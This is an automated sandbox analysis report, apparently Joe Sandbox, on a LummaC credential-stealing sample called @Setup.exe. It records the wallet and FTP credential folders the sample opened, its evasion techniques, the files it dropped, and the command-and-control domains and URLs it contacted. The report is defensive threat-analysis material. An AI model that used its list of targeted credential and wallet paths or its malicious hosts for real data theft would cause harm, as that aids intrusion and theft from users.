              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1843735948.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: @Setup.exe PID: 1900, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: @Setup.exe PID: 1900, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		11
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		11
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		LSASS Memory223
              System Information Discovery              		Remote Desktop Protocol41
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)12
              Process Injection              		4
              Obfuscated Files or Information              		Security Account Manager1
              Query Registry              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Software Packing              		NTDS521
              Security Software Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets221
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading              		Cached Domain Credentials4
              Process Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items221
              Virtualization/Sandbox Evasion              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
              Process Injection              		Proc Filesystem2
              System Owner/User Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581466 Sample: @Setup.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 79 dfgh.online 2->79 81 laborersquei.click 2->81 83 2 other IPs or domains 2->83 101 Suricata IDS alerts for network traffic 2->101 103 Found malware configuration 2->103 105 Malicious sample detected (through community Yara rule) 2->105 107 10 other signatures 2->107 12 @Setup.exe 1 2->12         started        signatures3 process4 dnsIp5 85 cegu.shop 185.161.251.21, 443, 49746 NTLGB United Kingdom 12->85 87 laborersquei.click 172.67.166.49, 443, 49731, 49732 CLOUDFLARENETUS United States 12->87 89 klipvumisui.shop 172.67.208.58, 443, 49747 CLOUDFLARENETUS United States 12->89 69 C:\Users\user\...69BKXWJSCH7YAAAADC9LJIYY.exe, PE32 12->69 dropped 109 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->109 111 Suspicious powershell command line found 12->111 113 Query firmware table information (likely to detect VMs) 12->113 115 4 other signatures 12->115 17 NBKXWJSCH7YAAAADC9LJIYY.exe 2 12->17         started        21 powershell.exe 15 23 12->21         started        file6 signatures7 process8 file9 61 C:\Users\user\...61BKXWJSCH7YAAAADC9LJIYY.tmp, PE32 17->61 dropped 91 Multi AV Scanner detection for dropped file 17->91 23 NBKXWJSCH7YAAAADC9LJIYY.tmp 3 5 17->23         started        93 Loading BitLocker PowerShell Module 21->93 26 conhost.exe 21->26         started        signatures10 process11 file12 63 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 23->63 dropped 65 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 23->65 dropped 28 NBKXWJSCH7YAAAADC9LJIYY.exe 2 23->28         started        process13 file14 67 C:\Users\user\...67BKXWJSCH7YAAAADC9LJIYY.tmp, PE32 28->67 dropped 31 NBKXWJSCH7YAAAADC9LJIYY.tmp 5 7 28->31         started        process15 file16 71 C:\Users\user\AppData\...\vsv_tool.exe (copy), PE32 31->71 dropped 73 C:\Users\user\AppData\...\is-C1AV0.tmp, PE32 31->73 dropped 75 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 31->75 dropped 77 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 31->77 dropped 34 vsv_tool.exe 31->34         started        37 cmd.exe 31->37         started        39 cmd.exe 31->39         started        41 5 other processes 31->41 process17 signatures18 95 Tries to detect virtualization through RDTSC time measurements 34->95 97 Switches to a custom stack to bypass stack traces 34->97 99 Found direct / indirect Syscall (likely to bypass EDR) 34->99 43 conhost.exe 37->43         started        45 tasklist.exe 37->45         started        47 find.exe 37->47         started        49 conhost.exe 39->49         started        51 tasklist.exe 39->51         started        53 find.exe 39->53         started        55 conhost.exe 41->55         started        57 conhost.exe 41->57         started        59 11 other processes 41->59 process19

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              @Setup.exe24%ReversingLabsWin32.Trojan.Generic
              @Setup.exe100%AviraTR/Patched.Gen2

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe16%ReversingLabsWin32.Spyware.Lummastealer
              C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-3URAC.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-3URAC.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-RPL3R.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-RPL3R.tmp\_isetup\_setup64.tmp0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://crl.usertr0%Avira URL Cloudsafe
              https://www.faststone.org/order.htmU0%Avira URL Cloudsafe
              http://www.microsoft.:0%Avira URL Cloudsafe
              https://klipvumisui.shop/Comn-0%Avira URL Cloudsafe
              http://www.faststone.org/U0%Avira URL Cloudsafe
              http://cevcsca2021.ocsp-certum.com070%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtH0%Avira URL Cloudsafe
              http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w0%Avira URL Cloudsafe
              https://klipvumisui.shop:443/int_clp_sha.txt0%Avira URL Cloudsafe
              https://laborersquei.click/0%Avira URL Cloudsafe
              https://klipvumisui.shop//0%Avira URL Cloudsafe
              https://dfgh.online/invoker.php?compName=0%Avira URL Cloudsafe
              https://cegu.shop:443/8574262446/ph.txt100%Avira URL Cloudmalware
              https://dfgh.online/invoker.php?compName=user-PCp0%Avira URL Cloudsafe
              http://www.faststone.org/FSCTutorial.htmU0%Avira URL Cloudsafe
              https://laborersquei.click/v-0%Avira URL Cloudsafe
              https://laborersquei.click/dd0%Avira URL Cloudsafe
              https://dfgh.online0%Avira URL Cloudsafe
              https://laborersquei.click/api0%Avira URL Cloudsafe
              https://laborersquei.click/&0%Avira URL Cloudsafe
              https://klipvumisui.shop/320%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txt0%Avira URL Cloudsafe
              https://laborersquei.click/apiB0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txth;100%Avira URL Cloudmalware
              https://laborersquei.click/apiK0%Avira URL Cloudsafe
              laborersquei.click0%Avira URL Cloudsafe
              https://laborersquei.click/apinp0%Avira URL Cloudsafe
              https://laborersquei.click:443/api0%Avira URL Cloudsafe
              http://www.faststone.org/FSCTutorial.htm0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                laborersquei.click
                		172.67.166.49
                		truefalse
                  		high
                  klipvumisui.shop
                  		172.67.208.58
                  		truefalse
                    		unknown
                    dfgh.online
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      scentniej.buzzfalse
                        		high
                        rebuildeso.buzzfalse
                          		high
                          appliacnesot.buzzfalse
                            		high
                            screwamusresz.buzzfalse
                              		high
                              cashfuzysao.buzzfalse
                                		high
                                inherineau.buzzfalse
                                  		high
                                  https://laborersquei.click/apitrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  hummskitnj.buzzfalse
                                    		high
                                    https://klipvumisui.shop/int_clp_sha.txtfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    laborersquei.clicktrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtab@Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU@Setup.exe, 00000000.00000003.2088539007.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.exe, 00000006.00000000.2273610331.0000000000EA1000.00000020.00000001.01000000.00000008.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=@Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#@Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.vmware.com/0vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://klipvumisui.shop:443/int_clp_sha.txt@Setup.exe, 00000000.00000003.2260343868.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2277544592.00000000009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0@Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://klipvumisui.shop/Comn-@Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.usertrNBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.microsoft.copowershell.exe, 00000004.00000002.2097486508.0000000008951000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://laborersquei.click/@Setup.exe, 00000000.00000003.1967303261.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2008196232.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1843769815.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1914963153.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1939970763.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1890690968.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1982017835.0000000000A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.microsoft.:powershell.exe, 00000004.00000002.2098749732.00000000089AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2080022379.0000000005091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.remobjects.com/psNBKXWJSCH7YAAAADC9LJIYY.exe, 00000006.00000003.2289731109.000000007EB7B000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000000.2298939123.0000000000F61000.00000020.00000001.01000000.00000009.sdmp, NBKXWJSCH7YAAAADC9LJIYY.exe, 00000008.00000003.2325279792.0000000003323000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000000.2332977821.000000000117D000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.innosetup.com/NBKXWJSCH7YAAAADC9LJIYY.exe, 00000006.00000003.2289731109.000000007EB7B000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000000.2298939123.0000000000F61000.00000020.00000001.01000000.00000009.sdmp, NBKXWJSCH7YAAAADC9LJIYY.exe, 00000008.00000003.2325279792.0000000003323000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000000.2332977821.000000000117D000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2080022379.0000000005091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.certum.pl/CPS0NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, @Setup.exe, _isdecmp.dll.9.drfalse
                                                              		high
                                                              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#@Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000002.2288771448.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://cevcsca2021.ocsp-certum.com07@Setup.exefalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://klipvumisui.shop/int_clp_sha.txtH@Setup.exe, 00000000.00000002.2288771448.0000000000A52000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.certum.pl/ctnca.crl0kNBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2305199635.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000007.00000003.2320879946.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, NBKXWJSCH7YAAAADC9LJIYY.tmp, 00000009.00000003.2888927263.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                        		high
                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://go.micropowershell.exe, 00000004.00000002.2080022379.00000000057FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://contoso.com/Iconpowershell.exe, 00000004.00000002.2088367725.00000000060F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.faststone.org/order.htmUvsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=@Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0@Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://ocsp.rootca1.amazontrust.com0:@Setup.exe, 00000000.00000003.1891299674.0000000003421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016@Setup.exe, 00000000.00000003.1844974801.0000000003483000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1845193558.0000000003437000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w@Setup.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.ecosia.org/newtab/@Setup.exe, 00000000.00000003.1844558977.0000000003429000.00000004.00000800.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.1844466578.000000000342C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.symauth.com/cps0(vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br@Setup.exe, 00000000.00000003.1892778952.0000000003503000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2080022379.00000000051E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.faststone.org/Uvsv_tool.exe, 00000025.00000002.2974801805.000000000491C000.00000004.00000020.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000000.2847542627.0000000000501000.00000020.00000001.01000000.0000000E.sdmp, is-C1AV0.tmp.9.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.symauth.com/rpa00vsv_tool.exe, 00000025.00000002.3051885653.0000000045DD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z@Setup.exe, 00000000.00000003.2259351038.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://support.microsof@Setup.exe, 00000000.00000003.1844974801.0000000003485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2080022379.00000000052C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.info-zip.org/vsv_tool.exe, 00000025.00000002.3051885653.0000000045BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://klipvumisui.shop//@Setup.exe, 00000000.00000002.2288771448.0000000000A55000.00000004.00000020.00020000.00000000.sdmp, @Setup.exe, 00000000.00000003.2259031205.0000000000A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples@Setup.exe, 00000000.00000003.1845193558.0000000003414000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
